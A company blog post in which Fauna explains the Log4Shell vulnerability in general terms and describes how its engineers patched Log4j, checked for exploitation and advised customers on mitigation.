Fauna’s response to the Log4Shell zero-day vulnerability
Tyson Trautmann|Dec 14th, 2021|
Fauna is a data API that allows developers to quickly and conveniently store application data without the hassle of managing and scaling a database. Many of the services that underpin Fauna’s API run on the Java Virtual Machine (JVM), a process that can execute any program that has been compiled into Java Bytecode. Those services leverage a popular open source logging utility called Apache Log4j, which is an Apache Software Foundation (ASF) project.
On December 9th, a critical vulnerability in Log4j was publicly disclosed and a proof of concept exploit was published on Github. The vulnerability, which was nicknamed Log4Shell, takes advantage of behavior in the Java Naming and Directory Interface (JNDI) that will download and execute remote classes in order to resolve a variable being written to a log. As a result of this behavior, attackers can host malicious code on a Lightweight Directory Access Protocol (LDAP) or other JNDI endpoint. They can then cause that malicious code to be downloaded and executed by passing a reference to the endpoint via any application input field that is directly written to a log using Log4j.
On December 10th, the National Institute of Standards and Technology (NIST) published a Common Vulnerabilities and Exposure (CVE) alert for the issue. Upon becoming aware of the vulnerability, Fauna engineers immediately declared an internal Live Site Event (LSE) and dropped all other work to investigate our internal systems and understand which services were impacted. Because Fauna services are deployed in automated release pipelines with release safety best practices baked in, impacted services were quickly patched to Log4j 2.15.0 and safely deployed to production by the end of the day. In parallel, engineers leveraged security software that is deployed in all Fauna production environments to look for anomalous behavior (e.g., unusual outbound network connections) and verified that the vulnerability was not exploited prior to the deployment of the patch. A few days later on December 14th, the NIST published a second CVE alert for a second, related issue in Log4j. Again, Fauna engineers patched impacted services to Log4j 2.16.0 and deployed them to production the same day. Fauna is a fully managed service, so no additional action was required by our customers to ensure that their data was not at risk.
Fauna’s operational logs make it very clear that a large number of attackers are scanning for services that are susceptible to Log4Shell. While our systems are no longer vulnerable, we strongly encourage Fauna customers and other developers that depend on Log4j to rapidly follow one of the mitigation options provided by the ASF.
If you have questions about Fauna’s response to Log4Shell, please contact our support team at email@example.com. Additionally, if you are a Fauna customer leveraging one of our Individual, Team, or Business plans and you have questions about mitigating the impact of Log4Shell in your application code that consumes our data API, please open a ticket via our support portal and we would be happy to assist.
If you enjoyed our blog, and want to work on systems and challenges related to globally distributed systems, serverless databases, and GraphQL, Fauna is hiring!
Subscribe to Fauna's newsletter
Get latest blog posts, development tips & tricks, and latest learning material delivered right to your inbox.